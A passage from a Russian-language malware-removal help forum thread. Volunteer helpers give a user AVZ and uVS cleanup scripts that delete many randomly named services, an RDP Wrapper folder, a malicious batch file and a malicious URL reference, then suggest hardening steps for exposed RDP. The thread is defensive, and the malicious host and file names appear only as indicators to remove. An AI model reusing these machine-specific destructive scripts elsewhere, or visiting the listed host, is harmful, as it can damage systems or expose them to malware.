     DeleteService('tfia');
     DeleteService('TfkV');
     DeleteService('tfsh');
     DeleteService('thCj');
     DeleteService('thgP');
     DeleteService('tivm');
     DeleteService('TIyM');
     DeleteService('TkbM');
     DeleteService('tKnj');
     DeleteService('TMkz');
     DeleteService('Toif');
     DeleteService('TQMU');
     DeleteService('ttXX');
     DeleteService('TurV');
     DeleteService('tvym');
     DeleteService('TWfY');
     DeleteService('TwqB');
     DeleteService('TWzz');
     DeleteService('TXcs');
     DeleteService('Tzov');
     DeleteService('uCMV');
     DeleteService('uEhY');
     DeleteService('UEjH');
     DeleteService('UGmp');
     DeleteService('UhZf');
     DeleteService('uiMw');
     DeleteService('UiOZ');
     DeleteService('UiRW');
     DeleteService('uIZB');
     DeleteService('UJdZ');
     DeleteService('ulhy');
     DeleteService('uLqf');
     DeleteService('UmhJ');
     DeleteService('umIz');
     DeleteService('uMrz');
     DeleteService('uNsj');
     DeleteService('uNXN');
     DeleteService('uoae');
     DeleteService('UoFS');
     DeleteService('uoLx');
     DeleteService('UOZp');
     DeleteService('UQSR');
     DeleteService('utUh');
     DeleteService('uxNA');
     DeleteService('uYpc');
     DeleteService('ValP');
     DeleteService('VAMF');
     DeleteService('vaVc');
     DeleteService('VBLM');
     DeleteService('Vdff');
     DeleteService('vDjA');
     DeleteService('vDQv');
     DeleteService('vEYK');
     DeleteService('VHTa');
     DeleteService('VihC');
     DeleteService('vjdm');
     DeleteService('vJfb');
     DeleteService('Vkms');
     DeleteService('vlbs');
     DeleteService('VMPf');
     DeleteService('vMRy');
     DeleteService('voom');
     DeleteService('VQgW');
     DeleteService('vrBj');
     DeleteService('VSRa');
     DeleteService('vsrh');
     DeleteService('VTwz');
     DeleteService('vUri');
     DeleteService('vvdG');
     DeleteService('vvdJ');
     DeleteService('vwxi');
     DeleteService('VYSq');
     DeleteService('WAGy');
     DeleteService('wAua');
     DeleteService('WbEi');
     DeleteService('WbOw');
     DeleteService('WCfP');
     DeleteService('wCIG');
     DeleteService('Wdhm');
     DeleteService('wDVc');
     DeleteService('WfxE');
     DeleteService('wFxP');
     DeleteService('wgBd');
     DeleteService('Wjwz');
     DeleteService('wkDx');
     DeleteService('WlCO');
     DeleteService('wmHm');
     DeleteService('wMrw');
     DeleteService('wonm');
     DeleteService('wpRK');
     DeleteService('WSEe');
     DeleteService('wtgX');
     DeleteService('WTzV');
     DeleteService('WuLQ');
     DeleteService('wUwV');
     DeleteService('WVel');
     DeleteService('WWvD');
     DeleteService('WxTn');
     DeleteService('wXUF');
     DeleteService('wXWl');
     DeleteService('wZtm');
     DeleteService('XaLt');
     DeleteService('XBcg');
     DeleteService('XDTO');
     DeleteService('xEtp');
     DeleteService('XeXx');
     DeleteService('xFnh');
     DeleteService('xgga');
     DeleteService('xhJw');
     DeleteService('xHUx');
     DeleteService('XJki');
     DeleteService('XkTx');
     DeleteService('Xliw');
     DeleteService('XmzQ');
     DeleteService('xnwl');
     DeleteService('XpiQ');
     DeleteService('XpLJ');
     DeleteService('xqsn');
     DeleteService('XraU');
     DeleteService('XtcV');
     DeleteService('xTOk');
     DeleteService('XVwL');
     DeleteService('xWaV');
     DeleteService('XWbd');
     DeleteService('xWEf');
     DeleteService('XYUK');
     DeleteService('xzcJ');
     DeleteService('YbBJ');
     DeleteService('ybyQ');
     DeleteService('YCGT');
     DeleteService('YcTA');
     DeleteService('yFMa');
     DeleteService('yfsF');
     DeleteService('YFuB');
     DeleteService('ygbC');
     DeleteService('YGHG');
     DeleteService('YgYt');
     DeleteService('yJth');
     DeleteService('yKBO');
     DeleteService('ykmR');
     DeleteService('YLyz');
     DeleteService('yOod');
     DeleteService('yOsz');
     DeleteService('YrfH');
     DeleteService('ytRT');
     DeleteService('YtSQ');
     DeleteService('YwAz');
     DeleteService('YWsT');
     DeleteService('zAqY');
     DeleteService('zbdb');
     DeleteService('zDVX');
     DeleteService('zehI');
     DeleteService('zgCj');
     DeleteService('zNHc');
     DeleteService('ZOxu');
     DeleteService('ZQDg');
     DeleteService('zrFb');
     DeleteService('ZShG');
     DeleteService('zSnC');
     DeleteService('ZuAs');
     DeleteService('ZUIe');
     DeleteService('ZWTd');
     DeleteService('zWTe');
     DeleteService('zYpO');
     DeleteService('ZZmI');
     DeleteService('ZZQG');
     DeleteFileMask('c:\program files\rdp wrapper', '*', true);
     DeleteDirectory('c:\program files\rdp wrapper');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 3, 3, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

    Отключите временно встроенный антивирус ("Защитник") - у него ложное срабатывание на компоненты используемой далее программы.
    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    06.10.2020
    Сообщений
    6
    Вес репутации
    1
    quarantine.zip создался но он пустой, в чём может быть ошибка?

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    31,789
    Вес репутации
    959
    Не попали файлы в карантин, продолжайте дальше выполнять рекомендации.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    06.10.2020
    Сообщений
    6
    Вес репутации
    1
    Universal Virus Sniffer создал файл размером 845 Кб форум не принимает такой размер.

  8. #7
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    3,306
    Вес репутации
    115
    Упакуйте в архив.

  9. #8
    Junior Member Репутация
    Регистрация
    06.10.2020
    Сообщений
    6
    Вес репутации
    1
    Так это и есть архив RAR

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    31,789
    Вес репутации
    959
    Загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку.
    Кстати, если по моей ссылке UVS скачивали, образ должен быть в архиве .7Z и чуть лучше сжат, чем в RAR.
    WBR,
    Vadim

  11. #10

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    31,789
    Вес репутации
    959
    Отключите временно антивирус.

    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.11.1 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv10.0
    v400c
    OFFSGNSAVE
    deltmp
    ;---------command-block---------
    unload %Sys32%\CMD.EXE
    deltsk %Sys32%\CMD.EXE
    delref >>C:/WINDOWS/TEMP/GOOGLEX.BAT
    delref >>C:/WINDOWS/TEMP/GOOGLEX.BAT&CMD.EXE
    zoo %SystemRoot%\TEMP\GOOGLEX.BAT
    delall %SystemRoot%\TEMP\GOOGLEX.BAT
    delref HTTP://GOOGLE.PROTOPOWER.ICU/MS.HTML
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\GOOGLEUPDATEBROKER.EXE
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
    apply
    
    czoo
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.

    Перезагрузите систему.

    В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    Судя по отключённым обновлениям системы и древнему билду Windows 10 со множеством уязвимостей, по сети восстановить заразу - пара пустяков.
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    06.10.2020
    Сообщений
    6
    Вес репутации
    1
    Если не ошибаюсь этот вирус зашёл в сеть когда открыл NAT на модеме для RDP.
    Вложения Вложения

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    31,789
    Вес репутации
    959
    Если к этому компьютеру сейчас доступа нет, скорее всего, по сети восстанавливают. Судя по логу, всё должно быть вычищено.
    Смените пароли всех учёток, с правами администратора в первую очередь.
    Уберите права администратора у всех пользователей, кому они действительно не необходимы, при грамотной настройке прав на папки и реестр всем они в 90% случаев не нужны.
    Не используйте имена пользователей SERVER, ADMIN, 123, DASHA и т. п., они во всех словарях брутфорса.

    Удаленная работа в офисе. RDP, Port Knocking, Mikrotik: просто и безопасно

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

Похожие темы

  1. Ответов: 22
    Последнее сообщение: 07.07.2017, 14:30
  2. Ответов: 8
    Последнее сообщение: 16.10.2014, 17:57
  3. Ответов: 5
    Последнее сообщение: 15.03.2013, 21:56
  4. Ответов: 3
    Последнее сообщение: 18.11.2011, 21:16
  5. Ответов: 4
    Последнее сообщение: 16.04.2008, 15:48

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00073 seconds with 20 queries